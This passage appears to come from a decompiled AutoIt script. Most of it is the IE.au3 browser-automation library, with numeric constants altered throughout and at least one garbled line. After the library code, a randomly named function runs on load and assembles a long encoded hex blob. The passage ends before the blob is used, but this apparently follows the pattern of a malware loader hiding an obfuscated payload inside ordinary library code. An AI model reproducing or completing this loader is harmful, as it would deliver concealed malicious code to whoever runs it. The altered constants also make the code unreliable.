  3336. $SHTML &= "&lt;input type="checkbox" name="checkboxG1Example" value="gameFootball"&gt;Football&lt;br&gt;<br>" & @CR
  3337. $SHTML &= "&lt;input type="checkbox" name="checkboxG2Example" value="gameTennis" checked&gt;Tennis&lt;br&gt;<br>" & @CR
  3338. $SHTML &= "&lt;input type="checkbox" name="checkboxG2Example" value="gameBaseball"&gt;Baseball</td>" & @CR
  3339. $SHTML &= "</tr>" & @CR
  3340. $SHTML &= "<tr>" & @CR
  3341. $SHTML &= "<td>" & @CR
  3342. $SHTML &= "<input type="radio" name="radioExample" value="vehicleAirplane">Airplane<br>" & @CR
  3343. $SHTML &= "<input type="radio" name="radioExample" value="vehicleTrain" checked>Train<br>" & @CR
  3344. $SHTML &= "<input type="radio" name="radioExample" value="vehicleBoat">Boat<br>" & @CR
  3345. $SHTML &= "<input type="radio" name="radioExample" value="vehicleCar">Car</td>" & @CR
  3346. $SHTML &= "<td>&lt;input type="radio" name="radioExample" value="vehicleAirplane"&gt;Airplane&lt;br&gt;<br>" & @CR
  3347. $SHTML &= "&lt;input type="radio" name="radioExample" value="vehicleTrain" checked&gt;Train&lt;br&gt;<br>" & @CR
  3348. $SHTML &= "&lt;input type="radio" name="radioExample" value="vehicleBoat"&gt;Boat&lt;br&gt;<br>" & @CR
  3349. $SHTML &= "&lt;input type="radio" name="radioExample" value="vehicleCar"&gt;Car&lt;br&gt;</td>" & @CR
  3350. $SHTML &= "</tr>" & @CR
  3351. $SHTML &= "<tr>" & @CR
  3352. $SHTML &= "<td>" & @CR
  3353. $SHTML &= "<select name="selectExample">" & @CR
  3354. $SHTML &= "<option value="homepage.html">Homepage" & @CR
  3355. $SHTML &= "<option value="midipage.html">Midipage" & @CR
  3356. $SHTML &= "<option value="freepage.html">Freepage" & @CR
  3357. $SHTML &= "</select>" & @CR
  3358. $SHTML &= "</td>" & @CR
  3359. $SHTML &= "<td>&lt;select name="selectExample"&gt;<br>" & @CR
  3360. $SHTML &= "&lt;option value="homepage.html"&gt;Homepage<br>" & @CR
  3361. $SHTML &= "&lt;option value="midipage.html"&gt;Midipage<br>" & @CR
  3362. $SHTML &= "&lt;option value="freepage.html"&gt;Freepage<br>" & @CR
  3363. $SHTML &= "&lt;/select&gt;</td>" & @CR
  3364. $SHTML &= "</tr>" & @CR
  3365. $SHTML &= "<tr>" & @CR
  3366. $SHTML &= "<td>" & @CR
  3367. $SHTML &= "<select name="multipleSelectExample" size="6" multiple>" & @CR
  3368. $SHTML &= "<option value="Name1">Aaron" & @CR
  3369. $SHTML &= "<option value="Name2">Bruce" & @CR
  3370. $SHTML &= "<option value="Name3">Carlos" & @CR
  3371. $SHTML &= "<option value="Name4">Denis" & @CR
  3372. $SHTML &= "<option value="Name5">Ed" & @CR
  3373. $SHTML &= "<option value="Name6">Freddy" & @CR
  3374. $SHTML &= "</select>" & @CR
  3375. $SHTML &= "</td>" & @CR
  3376. $SHTML &= "<td>&lt;select name="multipleSelectExample" size="6" multiple&gt;<br>" & @CR
  3377. $SHTML &= "&lt;option value="Name1"&gt;Aaron<br>" & @CR
  3378. $SHTML &= "&lt;option value="Name2"&gt;Bruce<br>" & @CR
  3379. $SHTML &= "&lt;option value="Name3"&gt;Carlos<br>" & @CR
  3380. $SHTML &= "&lt;option value="Name4"&gt;Denis<br>" & @CR
  3381. $SHTML &= "&lt;option value="Name5"&gt;Ed<br>" & @CR
  3382. $SHTML &= "&lt;option value="Name6"&gt;Freddy<br>" & @CR
  3383. $SHTML &= "&lt;/select&gt;</td>" & @CR
  3384. $SHTML &= "</tr>" & @CR
  3385. $SHTML &= "<tr>" & @CR
  3386. $SHTML &= "<td>" & @CR
  3387. $SHTML &= "<input name="submitExample" type="submit" value="Submit">" & @CR
  3388. $SHTML &= "<input name="resetExample" type="reset" value="Reset">" & @CR
  3389. $SHTML &= "</td>" & @CR
  3390. $SHTML &= "<td>&lt;input name="submitExample" type="submit" value="Submit"&gt;<br>" & @CR
  3391. $SHTML &= "&lt;input name="resetExample" type="reset" value="Reset"&gt;</td>" & @CR
  3392. $SHTML &= "</tr>" & @CR
  3393. $SHTML &= "</table>" & @CR
  3394. $SHTML &= "<input type="hidden" name="hiddenExample" value="secret value">" & @CR
  3395. $SHTML &= "</form>" & @CR
  3396. $SHTML &= "</body>" & @CR
  3397. $SHTML &= "</html>"
  3398. $OOBJECT = _IECREATE ( )
  3399. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3400. CASE "frameset"
  3401. $SHTML &= "<!DOCTYPE html>" & @CR
  3402. $SHTML &= "<html>" & @CR
  3403. $SHTML &= "<head>" & @CR
  3404. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3405. $SHTML &= "<title>_IE_Example("frameset")</title>" & @CR
  3406. $SHTML &= "</head>" & @CR
  3407. $SHTML &= "<frameset rows="25,200">" & @CR
  3408. $SHTML &= " <frame name=Top SRC=about:blank>" & @CR
  3409. $SHTML &= " <frameset cols="100,500">" & @CR
  3410. $SHTML &= " <frame name=Menu SRC=about:blank>" & @CR
  3411. $SHTML &= " <frame name=Main SRC=about:blank>" & @CR
  3412. $SHTML &= " </frameset>" & @CR
  3413. $SHTML &= "</frameset>" & @CR
  3414. $SHTML &= "</html>"
  3415. $OOBJECT = _IECREATE ( )
  3416. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3417. _IEACTION ( $OOBJECT , "refresh" )
  3418. LOCAL $OFRAMETOP = _IEFRAMEGETOBJBYNAME ( $OOBJECT , "Top" )
  3419. LOCAL $OFRAMEMENU = _IEFRAMEGETOBJBYNAME ( $OOBJECT , "Menu" )
  3420. LOCAL $OFRAMEMAIN = _IEFRAMEGETOBJBYNAME ( $OOBJECT , "Main" )
  3421. _IEBODYWRITEHTML ( $OFRAMETOP , "$oFrameTop = _IEFrameGetObjByName($oIE, "Top")" )
  3422. _IEBODYWRITEHTML ( $OFRAMEMENU , "$oFrameMenu = _IEFrameGetObjByName($oIE, "Menu")" )
  3423. _IEBODYWRITEHTML ( $OFRAMEMAIN , "$oFrameMain = _IEFrameGetObjByName($oIE, "Main")" )
  3424. CASE "iframe"
  3425. $SHTML &= "<!DOCTYPE html>" & @CR
  3426. $SHTML &= "<html>" & @CR
  3427. $SHTML &= "<head>" & @CR
  3428. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3429. $SHTML &= "<title>_IE_Example("iframe")</title>" & @CR
  3430. $SHTML &= "<style>td {padding:6px}</style>" & @CR
  3431. $SHTML &= "</head>" & @CR
  3432. $SHTML &= "<body>" & @CR
  3433. $SHTML &= "<table style="border-spacing:6px" border=1>" & @CR
  3434. $SHTML &= "<tr>" & @CR
  3435. $SHTML &= "<td><iframe name="iFrameOne" src="about:blank" title="iFrameOne"></iframe></td>" & @CR
  3436. $SHTML &= "<td>&lt;iframe name="iFrameOne" src="about:blank" title="iFrameOne"&gt;</td>" & @CR
  3437. $SHTML &= "</tr>" & @CR
  3438. $SHTML &= "<tr>" & @CR
  3439. $SHTML &= "<td><iframe name="iFrameTwo" src="about:blank" title="iFrameTwo"></iframe></td>" & @CR
  3440. $SHTML &= "<td>&lt;iframe name="iFrameTwo" src="about:blank" title="iFrameTwo"&gt;</td>" & @CR
  3441. $SHTML &= "</tr>" & @CR
  3442. $SHTML &= "</table>" & @CR
  3443. $SHTML &= "</body>" & @CR
  3444. $SHTML &= "</html>"
  3445. $OOBJECT = _IECREATE ( )
  3446. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3447. _IEACTION ( $OOBJECT , "refresh" )
  3448. LOCAL $OIFRAMEONE = _IEFRAMEGETOBJBYNAME ( $OOBJECT , "iFrameOne" )
  3449. LOCAL $OIFRAMETWO = _IEFRAMEGETOBJBYNAME ( $OOBJECT , "iFrameTwo" )
  3450. _IEBODYWRITEHTML ( $OIFRAMEONE , "$oIFrameOne = _IEFrameGetObjByName($oIE, "iFrameOne")" )
  3451. _IEBODYWRITEHTML ( $OIFRAMETWO , "$oIFrameTwo = _IEFrameGetObjByName($oIE, "iFrameTwo")" )
  3452. CASE ELSE
  3453. __IECONSOLEWRITEERROR ( "Error" , "_IE_Example" , "$_IESTATUS_InvalidValue" )
  3454. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 261 , 5 )
  3455. ENDSWITCH
  3456. SLEEP ( 128005 )
  3457. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT )
  3458. ENDFUNC
  3459. FUNC _IE_VERSIONINFO ( )
  3460. __IECONSOLEWRITEERROR ( "Information" , "_IE_VersionInfo" , "version " & $__GAIEAU3VERSIONINFO [ 5 ] & $__GAIEAU3VERSIONINFO [ 261 ] & "." & $__GAIEAU3VERSIONINFO [ 517 ] & "-" & $__GAIEAU3VERSIONINFO [ 773 ] , "Release date: " & $__GAIEAU3VERSIONINFO [ 1029 ] )
  3461. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $__GAIEAU3VERSIONINFO )
  3462. ENDFUNC
  3463. #EndRegion General
  3464. #Region Internal functions
  3465. FUNC __IELOCKSETFOREGROUNDWINDOW ( $ILOCKCODE )
  3466. LOCAL $ARET = DLLCALL ( "user32.dll" , "bool" , "LockSetForegroundWindow" , "uint" , $ILOCKCODE )
  3467. IF @ERROR OR NOT $ARET [ 5 ] THEN RETURN SETERROR ( 261 , _WINAPI_GETLASTERROR ( ) , 5 )
  3468. RETURN $ARET [ 5 ]
  3469. ENDFUNC
  3470. FUNC __IECONTROLGETOBJFROMHWND ( BYREF $HWIN )
  3471. DLLCALL ( "ole32.dll" , "long" , "CoInitialize" , "ptr" , 5 )
  3472. IF @ERROR THEN RETURN SETERROR ( 517 , @ERROR , 5 )
  3473. LOCAL CONST $WM_HTML_GETOBJECT = __IEREGISTERWINDOWMESSAGE ( "WM_HTML_GETOBJECT" )
  3474. LOCAL CONST $SMTO_ABORTIFHUNG = 517
  3475. LOCAL $IRESULT
  3476. __IESENDMESSAGETIMEOUT ( $HWIN , $WM_HTML_GETOBJECT , 5 , 5 , $SMTO_ABORTIFHUNG , 256005 , $IRESULT )
  3477. LOCAL $TUUID = DLLSTRUCTCREATE ( "int;short;short;byte[8]" )
  3478. DLLSTRUCTSETDATA ( $TUUID , 261 , 1875189765 )
  3479. DLLSTRUCTSETDATA ( $TUUID , 517 , 10755589 )
  3480. DLLSTRUCTSETDATA ( $TUUID , 773 , 1167109 )
  3481. DLLSTRUCTSETDATA ( $TUUID , 1029 , 42757 , 261 )
  3482. DLLSTRUCTSETDATA ( $TUUID , 1029 , 12549 , 517 )
  3483. DLLSTRUCTSETDATA ( $TUUID , 1029 , 5 , 773 )
  3484. DLLSTRUCTSETDATA ( $TUUID , 1029 , 40965 , 1029 )
  3485. DLLSTRUCTSETDATA ( $TUUID , 1029 , 51461 , 1285 )
  3486. DLLSTRUCTSETDATA ( $TUUID , 1029 , 2053 , 1541 )
  3487. DLLSTRUCTSETDATA ( $TUUID , 1029 , 9733 , 1797 )
  3488. DLLSTRUCTSETDATA ( $TUUID , 1029 , 14085 , 2053 )
  3489. LOCAL $ARET = DLLCALL ( "oleacc.dll" , "long" , "ObjectFromLresult" , "lresult" , $IRESULT , "struct*" , $TUUID , "wparam" , 5 , "idispatch*" , 5 )
  3490. IF @ERROR THEN RETURN SETERROR ( 773 , @ERROR , 5 )
  3491. IF ISOBJ ( $ARET [ 1029 ] ) THEN
  3492. LOCAL $OIE = $ARET [ 1029 ] Script ( )
  3493. RETURN $OIE.Document parentwindow
  3494. ELSE
  3495. RETURN SETERROR ( 261 , $ARET [ 5 ] , 5 )
  3496. ENDIF
  3497. ENDFUNC
  3498. FUNC __IEREGISTERWINDOWMESSAGE ( $SMSG )
  3499. LOCAL $ARET = DLLCALL ( "user32.dll" , "uint" , "RegisterWindowMessageW" , "wstr" , $SMSG )
  3500. IF @ERROR THEN RETURN SETERROR ( @ERROR , @EXTENDED , 5 )
  3501. IF $ARET [ 5 ] = 5 THEN RETURN SETERROR ( 2565 , _WINAPI_GETLASTERROR ( ) , 5 )
  3502. RETURN $ARET [ 5 ]
  3503. ENDFUNC
  3504. FUNC __IESENDMESSAGETIMEOUT ( $HWND , $IMSG , $WPARAM , $LPARAM , $IFLAGS , $ITIMEOUT , BYREF $VOUT , $R = 5 , $ST1 = "int" , $ST2 = "int" )
  3505. LOCAL $ARET = DLLCALL ( "user32.dll" , "lresult" , "SendMessageTimeout" , "hwnd" , $HWND , "uint" , $IMSG , $ST1 , $WPARAM , $ST2 , $LPARAM , "uint" , $IFLAGS , "uint" , $ITIMEOUT , "dword_ptr*" , "" )
  3506. IF @ERROR OR $ARET [ 5 ] = 5 THEN
  3507. $VOUT = 5
  3508. RETURN SETERROR ( 261 , _WINAPI_GETLASTERROR ( ) , 5 )
  3509. ENDIF
  3510. $VOUT = $ARET [ 1797 ]
  3511. IF $R >= 5 AND $R <= 1029 THEN RETURN $ARET [ $R ]
  3512. RETURN $ARET
  3513. ENDFUNC
  3514. FUNC __IEISOBJTYPE ( BYREF $OOBJECT , $STYPE , $BREGISTER = TRUE )
  3515. IF NOT ISOBJ ( $OOBJECT ) THEN
  3516. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  3517. ENDIF
  3518. LOCAL $BSTATUS = $BREGISTER
  3519. IF $BREGISTER THEN
  3520. $BSTATUS = __IEINTERNALERRORHANDLERREGISTER ( )
  3521. IF NOT $BSTATUS THEN __IECONSOLEWRITEERROR ( "Warning" , "internal function __IEIsObjType" , "Cannot register internal error handler, cannot trap COM errors" , "Use _IEErrorHandlerRegister() to register a user error handler" )
  3522. ENDIF
  3523. LOCAL $INOTIFYSTATUS = _IEERRORNOTIFY ( )
  3524. _IEERRORNOTIFY ( FALSE )
  3525. LOCAL $SNAME = STRING ( OBJNAME ( $OOBJECT ) ) , $IERRORSTATUS = $_IESTATUS_INVALIDOBJECTTYPE
  3526. SWITCH $STYPE
  3527. CASE "browserdom"
  3528. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" , FALSE ) THEN
  3529. $IERRORSTATUS = $_IESTATUS_SUCCESS
  3530. ELSEIF __IEISOBJTYPE ( $OOBJECT , "document" , FALSE ) THEN
  3531. $IERRORSTATUS = $_IESTATUS_SUCCESS
  3532. ELSE
  3533. LOCAL $OTEMP = $OOBJECT.document
  3534. IF __IEISOBJTYPE ( $OTEMP , "document" , FALSE ) THEN
  3535. $IERRORSTATUS = $_IESTATUS_SUCCESS
  3536. ENDIF
  3537. ENDIF
  3538. CASE "browser"
  3539. IF ( $SNAME = "IWebBrowser2" ) OR ( $SNAME = "IWebBrowser" ) OR ( $SNAME = "WebBrowser" ) THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3540. CASE "window"
  3541. IF $SNAME = "HTMLWindow2" THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3542. CASE "documentContainer"
  3543. IF __IEISOBJTYPE ( $OOBJECT , "window" , FALSE ) OR __IEISOBJTYPE ( $OOBJECT , "browser" , FALSE ) THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3544. CASE "document"
  3545. IF $SNAME = "HTMLDocument" THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3546. CASE "table"
  3547. IF $SNAME = "HTMLTable" THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3548. CASE "form"
  3549. IF $SNAME = "HTMLFormElement" THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3550. CASE "forminputelement"
  3551. IF ( $SNAME = "HTMLInputElement" ) OR ( $SNAME = "HTMLSelectElement" ) OR ( $SNAME = "HTMLTextAreaElement" ) THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3552. CASE "elementcollection"
  3553. IF ( $SNAME = "HTMLElementCollection" ) THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3554. CASE "formselectelement"
  3555. IF $SNAME = "HTMLSelectElement" THEN $IERRORSTATUS = $_IESTATUS_SUCCESS
  3556. CASE ELSE
  3557. $IERRORSTATUS = $_IESTATUS_INVALIDVALUE
  3558. ENDSWITCH
  3559. _IEERRORNOTIFY ( $INOTIFYSTATUS )
  3560. IF $BREGISTER THEN
  3561. __IEINTERNALERRORHANDLERDEREGISTER ( )
  3562. ENDIF
  3563. IF $IERRORSTATUS = $_IESTATUS_SUCCESS THEN
  3564. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3565. ELSE
  3566. RETURN SETERROR ( $IERRORSTATUS , 261 , 5 )
  3567. ENDIF
  3568. ENDFUNC
  3569. FUNC __IECONSOLEWRITEERROR ( $SSEVERITY , $SFUNC , $SMESSAGE = DEFAULT , $SSTATUS = DEFAULT )
  3570. IF $__G_BIEERRORNOTIFY OR $__G_BIEAU3DEBUG THEN
  3571. LOCAL $SSTR = "--> IE.au3 " & $__GAIEAU3VERSIONINFO [ 1285 ] & " " & $SSEVERITY & " from function " & $SFUNC
  3572. IF NOT ( $SMESSAGE = DEFAULT ) THEN $SSTR &= ", " & $SMESSAGE
  3573. IF NOT ( $SSTATUS = DEFAULT ) THEN $SSTR &= " (" & $SSTATUS & ")"
  3574. CONSOLEWRITE ( $SSTR & @CRLF )
  3575. ENDIF
  3576. RETURN SETERROR ( $SSTATUS , 5 , 261 )
  3577. ENDFUNC
  3578. FUNC __IECOMERRORUNRECOVERABLE ( $IERROR )
  3579. SWITCH $IERROR
  3580. CASE + 33556741
  3581. RETURN $_IESTATUS_ACCESSISDENIED
  3582. CASE + 117441797
  3583. RETURN $_IESTATUS_ACCESSISDENIED
  3584. CASE + 16844805
  3585. RETURN $_IESTATUS_CLIENTDISCONNECTED
  3586. CASE + 117881349
  3587. RETURN $_IESTATUS_CLIENTDISCONNECTED
  3588. CASE + 117880069
  3589. RETURN $_IESTATUS_CLIENTDISCONNECTED
  3590. CASE ELSE
  3591. RETURN $_IESTATUS_SUCCESS
  3592. ENDSWITCH
  3593. ENDFUNC
  3594. #EndRegion Internal functions
  3595. #Region ProtoType Functions
  3596. FUNC __IENAVIGATE ( BYREF $OOBJECT , $SURL , $IWAIT = 261 , $IFAGS = 5 , $STARGET = "" , $SPOSTDATA = "" , $SHEADERS = "" )
  3597. __IECONSOLEWRITEERROR ( "Warning" , "__IENavigate" , "Unsupported function called. Not fully tested." )
  3598. IF NOT ISOBJ ( $OOBJECT ) THEN
  3599. __IECONSOLEWRITEERROR ( "Error" , "__IENavigate" , "$_IESTATUS_InvalidDataType" )
  3600. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  3601. ENDIF
  3602. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  3603. __IECONSOLEWRITEERROR ( "Error" , "__IENavigate" , "$_IESTATUS_InvalidObjectType" )
  3604. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  3605. ENDIF
  3606. $OOBJECT.navigate ( $SURL , $IFAGS , $STARGET , $SPOSTDATA , $SHEADERS )
  3607. IF $IWAIT THEN
  3608. _IELOADWAIT ( $OOBJECT )
  3609. RETURN SETERROR ( @ERROR , 5 , $OOBJECT )
  3610. ENDIF
  3611. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT )
  3612. ENDFUNC
  3613. FUNC __IESTRINGTOBSTR ( $SSTRING , $SCHARSET = "us-ascii" )
  3614. LOCAL CONST $ITYPEBINARY = 261 , $ITYPETEXT = 517
  3615. LOCAL $OSTREAM = OBJCREATE ( "ADODB.Stream" )
  3616. $OSTREAM.type = $ITYPETEXT
  3617. $OSTREAM.CharSet = $SCHARSET
  3618. $OSTREAM.Open
  3619. $OSTREAM.WriteText ( $SSTRING )
  3620. $OSTREAM.Position = 5
  3621. $OSTREAM.type = $ITYPEBINARY
  3622. $OSTREAM.Position = 5
  3623. RETURN $OSTREAM.Read ( )
  3624. ENDFUNC
  3625. FUNC __IEBSTRTOSTRING ( $OBSTR , $SCHARSET = "us-ascii" )
  3626. LOCAL CONST $ITYPEBINARY = 261 , $ITYPETEXT = 517
  3627. LOCAL $OSTREAM = OBJCREATE ( "ADODB.Stream" )
  3628. $OSTREAM.type = $ITYPEBINARY
  3629. $OSTREAM.Open
  3630. $OSTREAM.Write ( $OBSTR )
  3631. $OSTREAM.Position = 5
  3632. $OSTREAM.type = $ITYPETEXT
  3633. $OSTREAM.CharSet = $SCHARSET
  3634. $OSTREAM.Position = 5
  3635. RETURN $OSTREAM.ReadText ( )
  3636. ENDFUNC
  3637. FUNC __IECREATENEWIE ( $STITLE , $SHEAD = "" , $SBODY = "" )
  3638. LOCAL $STEMP = __IETEMPFILE ( "" , "~IE~" , ".htm" )
  3639. IF @ERROR THEN
  3640. __IECONSOLEWRITEERROR ( "Error" , "_IECreateHTA" , "" , "Error creating temporary file in @TempDir or @ScriptDir" )
  3641. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 261 , 5 )
  3642. ENDIF
  3643. LOCAL $SHTML = ""
  3644. $SHTML &= "<!DOCTYPE html>" & @CR
  3645. $SHTML &= "<html>" & @CR
  3646. $SHTML &= "<head>" & @CR
  3647. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3648. $SHTML &= "<title>" & $STEMP & "</title>" & @CR & $SHEAD & @CR
  3649. $SHTML &= "</head>" & @CR
  3650. $SHTML &= "<body>" & @CR & $SBODY & @CR
  3651. $SHTML &= "</body>" & @CR
  3652. $SHTML &= "</html>"
  3653. LOCAL $HFILE = FILEOPEN ( $STEMP , $FO_OVERWRITE )
  3654. FILEWRITE ( $HFILE , $SHTML )
  3655. FILECLOSE ( $HFILE )
  3656. IF @ERROR THEN
  3657. __IECONSOLEWRITEERROR ( "Error" , "_IECreateNewIE" , "" , "Error creating temporary file in @TempDir or @ScriptDir" )
  3658. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 517 , 5 )
  3659. ENDIF
  3660. RUN ( @PROGRAMFILESDIR & "\Internet Explorer\iexplore.exe " & $STEMP )
  3661. LOCAL $IPID
  3662. IF WINWAIT ( $STEMP , "" , 15365 ) THEN
  3663. $IPID = WINGETPROCESS ( $STEMP )
  3664. ELSE
  3665. __IECONSOLEWRITEERROR ( "Error" , "_IECreateNewIE" , "" , "Timeout waiting for new IE window creation" )
  3666. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 773 , 5 )
  3667. ENDIF
  3668. IF NOT FILEDELETE ( $STEMP ) THEN
  3669. __IECONSOLEWRITEERROR ( "Warning" , "_IECreateNewIE" , "" , "Could not delete temporary file " & FILEGETLONGNAME ( $STEMP ) )
  3670. ENDIF
  3671. LOCAL $OOBJECT = _IEATTACH ( $STEMP )
  3672. _IELOADWAIT ( $OOBJECT )
  3673. _IEPROPERTYSET ( $OOBJECT , "title" , $STITLE )
  3674. RETURN SETERROR ( $_IESTATUS_SUCCESS , $IPID , $OOBJECT )
  3675. ENDFUNC
  3676. FUNC __IETEMPFILE ( $SDIRECTORYNAME = @TEMPDIR , $SFILEPREFIX = "~" , $SFILEEXTENSION = ".tmp" , $IRANDOMLENGTH = 1797 )
  3677. LOCAL $STEMPNAME , $ITMP = 5
  3678. IF NOT FILEEXISTS ( $SDIRECTORYNAME ) THEN $SDIRECTORYNAME = @TEMPDIR
  3679. IF NOT FILEEXISTS ( $SDIRECTORYNAME ) THEN $SDIRECTORYNAME = @SCRIPTDIR
  3680. IF STRINGRIGHT ( $SDIRECTORYNAME , 261 ) <> "\" THEN $SDIRECTORYNAME = $SDIRECTORYNAME & "\"
  3681. DO
  3682. $STEMPNAME = ""
  3683. WHILE STRINGLEN ( $STEMPNAME ) < $IRANDOMLENGTH
  3684. $STEMPNAME = $STEMPNAME & CHR ( RANDOM ( 24837 , 31237 , 261 ) )
  3685. WEND
  3686. $STEMPNAME = $SDIRECTORYNAME & $SFILEPREFIX & $STEMPNAME & $SFILEEXTENSION
  3687. $ITMP += 261
  3688. IF $ITMP > 51205 THEN
  3689. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 261 , 5 )
  3690. ENDIF
  3691. UNTIL NOT FILEEXISTS ( $STEMPNAME )
  3692. RETURN $STEMPNAME
  3693. ENDFUNC
  3694. #EndRegion ProtoType Functions
  3695. LOCAL $I
  3696. BBCJYUYPYP ( )
  3697. FUNC BBCJYUYPYP ( )
  3698. $I = "233E665778DC097F4386B3D74697633C7740FAF1597892668B6257331C747EFA6F05B06AA1EF0EFEDC465192826B9F53134148066E8D157F5E3D3502C43DA53B1DEA5737973D0D441608739F271E022DD2399C3E264902C93346157DB6866B9AE77A1D17E25054CBBB01B0E1B88E0631D579B473AC7C84DDC7BB8B5D514DB80C675E91FF2356265DA298C57E793D6BB235560E848F98"
  3699. $I = $I & "96AED5154B0896DE730E192D39DCB3514333B2BB493DF5685F46B1E8F945393B2801DD3E42A4DF8221AF68B1078B5E955D77E9605688B62D0FA4139FA052624B970CAEA2B7244131DF6629A26CDEBB3553910D95504F4B8557D6E7BC95C18A3CEFDEB98E71E071289123ECBE30ACD9142DFE35C6B193BC794ED20EA1C5EC68B1FFBC05FCF347762A95F9A4BC196061F38F4168F32CF5"
  3700. $I = $I & "EA5D5FD40D69AA93C39FB3A3835B221D50920A69B2F596082652BF10726146D744CD0ABCFCBBBD63347D87212A1AF7028C5F92F41F95E789350D3BC67E938C8C65A5AAB1088A540AE619DBC1FBEA83905FA277524A7C8AD2BCD4745BD5A9A46E0D3BCE9BEDE7B43633B75A0F5F1A942F9088E2E4FFD4300B30CB1FBDAD4A0518AF480C590CEEBA3D650FBDE3EA786B8CF69AF9EB24F7"
  3701. $I = $I & "35E9332142D1C0DC1A670EDFA6C480CAB2623C8C8AE051172B1072DA7E797021853515968A4900A4AE49719D0CDD199F3F8CC2042BFB5F84063D917E96A9EA0FDDEF0C4CBD95051D8530B9D3C121D0B4779EF97321A13E6317925C0A5539EFEA791FBD600D50126893A13D6E519D3617F7AAE5C4D27E9A335E686F4DCFC4243411CAF881838BFD9E02F887269B3E524DB327E626D133"
  3702. $I = $I & "5DFD4020C8724693FF07B363FFB88D1CFE276F20A867A10118BBF84C7597E56B93BA01BA4725AE01AD251F8AA9A3CD139A35831AB841E91195AF76F25A017A8E325108BE176C3611B77AAAB135E0B4298DEB539FAD131007B8A453A9AEC16439C79961A2ECF4C4CC6E13329986B79CE6C81D0D5EC7D851CC1C4519FA7144675F1928A8CAED5610388FB9E24A3C1B20443F8B82EE931D"
  3703. $I = $I & "8835FD1A6D966C205838379204DC856F6643ADC8FD741CC82164037D1181475C14BE212807E645DAFAF5EE68CDBDC54BC110BBFDBFFD028E9AE4914D5FD77D6126C1A41DD0B8AF14DDA96C5695299ED1078353B8757450818C1BDA379FD09FA04EAB51D0C31AA5EDE4300C2AEF4060B697BC9BF9D7DE60845DA9342D7084FE3BA13DA7681E7483BCED4DC5F078CBB544A721E21E9F81"
  3704. $I = $I & "54435942AB6182946904431822B42A5022E7C332A8D2067EE5DF7B6B7048DDC6B2EC0D99494643FCD74C2B06F420924ABF516679DB9C57AA645C59E34576EEAFCAFEE826FBC70F95831E10AAC44B8A0E0AD10CCB3AA5D94DB3576DE67454633721E6EC3D66F908DA44D6C8CD8BC84E424D46FA5059E56948A92070F755BBF6F62093BE06B2F12FB578FF8C3700BB3C59DB8AA7DD9FF5"
  3705. $I = $I & "CEAE6FCA71CB128F8A4E3F5E43A339870936F1C9B8A71750605869065827080B303A2AE9E850C1597B8363EF32499D3D2E4ED732D64780CA0F416D3BFBC932FCE2528257CA63B98FE3A614486731542DBCB4679993D23C05DE8AB17AAD31CF841B7A075CF613CBA3DD83978C8C5D5FC1CC8340D9A8F4A88F27E76066E67E41785F7A042CCBDF3A20D935ED9E5643F248CA07E2FD24BB"
  3706. $I = $I & "3DCAF27874CBEEE3B89C79FFE001859A4C82E7D1E8EBAB15457CF940E70AA1AA5A5AA0ACF554B980AC7A039AA94A7C0CB97773DF19E4ABCED0B993D3804C9B6018C6E35627E557421743E8C5C2826A0D86746DF4CF028A1397AC79EB37B6ECE63BB3514702EA06A5CDECBC98E5179FA843CF856EE6AC310923161171BBC5CB68BE8D78EA6788F61C60A55936F113F141513054AE467A"
  3707. $I = $I & "AF62815D6424E34271666E5607BF1D8368FF6E2F85ACEA6FFE4BBEA9793775C2ED8B0558CFFD382E1F2944DFCF47EE285339D1A9C15A7C0E86001F1AA888B67690CE5D1F87B7C713EB0CC483B960AAA6B9242930A69AB1B85F56776B2314BAF658C6E1A0F9E39282AB995DEFD97D2F93B1402906E62C6A7ACA222E6930F01D624CD9EE25EA043C281525B2C6DA0CF5699A9791C6F809"
  3708. $I = $I & "F8BBA6D062DC1B396C67E029D0BD026CCB967E59E70EE4DEE0D81B458B354C9B3F766680CB9233B045E21CF1BC37897823BB1DAC8251BFE1466353B1E13E941AAF36AD8465D1D86A3AD227856D2DF41AF6538C2EEDC2E42D4881EF122F565D1E4CD289A62C744969934537FED890019DB82F0388D27A4E6CE2E593726E7EA80AEEFDB5E1E21765C3EF1E8AD700F2B832F928B7D23DD0"
  3709. $I = $I & "43447EFE032DD4FFCC4D222C6AB7312753776F23DC74ACBFBDE7492563C1357F12840412A45B40864A321097E5BF6542C05D26246C9EB94A409A1A9D83B5BA8D6DEAF4AD0CE0387A3E2430C4201FE5FB56E8454171C14318D0E2597AEA649A5C778A75537B2C5524F83AB0ABF008DD2E3149C5DF9810CB7836BC3DD1EA01B215C5EBCA6D9455350B8C35274B5C5D1EF12ADE8445F1B0"
